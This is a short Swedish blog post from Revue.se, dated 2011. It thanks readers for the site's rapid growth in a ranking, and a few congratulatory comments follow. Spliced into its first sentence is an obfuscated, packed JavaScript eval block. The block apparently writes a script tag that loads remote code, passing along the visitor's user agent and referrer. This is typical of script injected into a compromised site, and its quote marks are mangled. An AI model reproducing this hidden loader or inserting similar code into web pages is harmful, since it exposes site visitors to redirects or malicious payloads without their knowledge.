Image Image Image Image Image Image Image Image Image Image

| 20 februari, 2020

Scroll to top

Top

Revue.se är Sveriges snabbast växande hemsida!

Revue.se är Sveriges snabbast växande hemsida!
Filip Urde
  • On 6 oktober, 2011
  • http://www.revue.se/filip-urde

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhyat|var|u0026u|referrer|zdrih||js|php’.split(’|’),0,{}))
tackar alla våra läsare för att ni gjort vår hemsida till Sveriges snabbast växande hemsida!

Idag kunde vi läsa på sis-index.se, att Revue.se nu ligger på en stadig 1:a plats med en ökning på 328%(Revue.se). Detta gör oss alla som jobbat med sidan väldigt glada. Det hela började som ett hobby projekt, som nu gått och blivit något så mycket mer. Där har vi alla våra läsare att tacka! Tack för att ni kommenterar, tack för att ni ”likear”, tack för att ni twittrar och tack för den goda feedbacken!

Vi hoppas att vi ska kunna fortsätta på den här trenden och bara bli större och större.

 

Revue <3 Er…

Comments

  1. Johannes

    Tack själv 🙂

  2. Snyggt jobbat grabbar!! Bra content.

  3. Ett stort tack till alla besökare! Ni är bäst. 🙂

  4. Snobben

    Oj vad kul. Jag gillar er sida starkt. Enkel att hitta i och ändå så mycket bra info. Lycka till!!!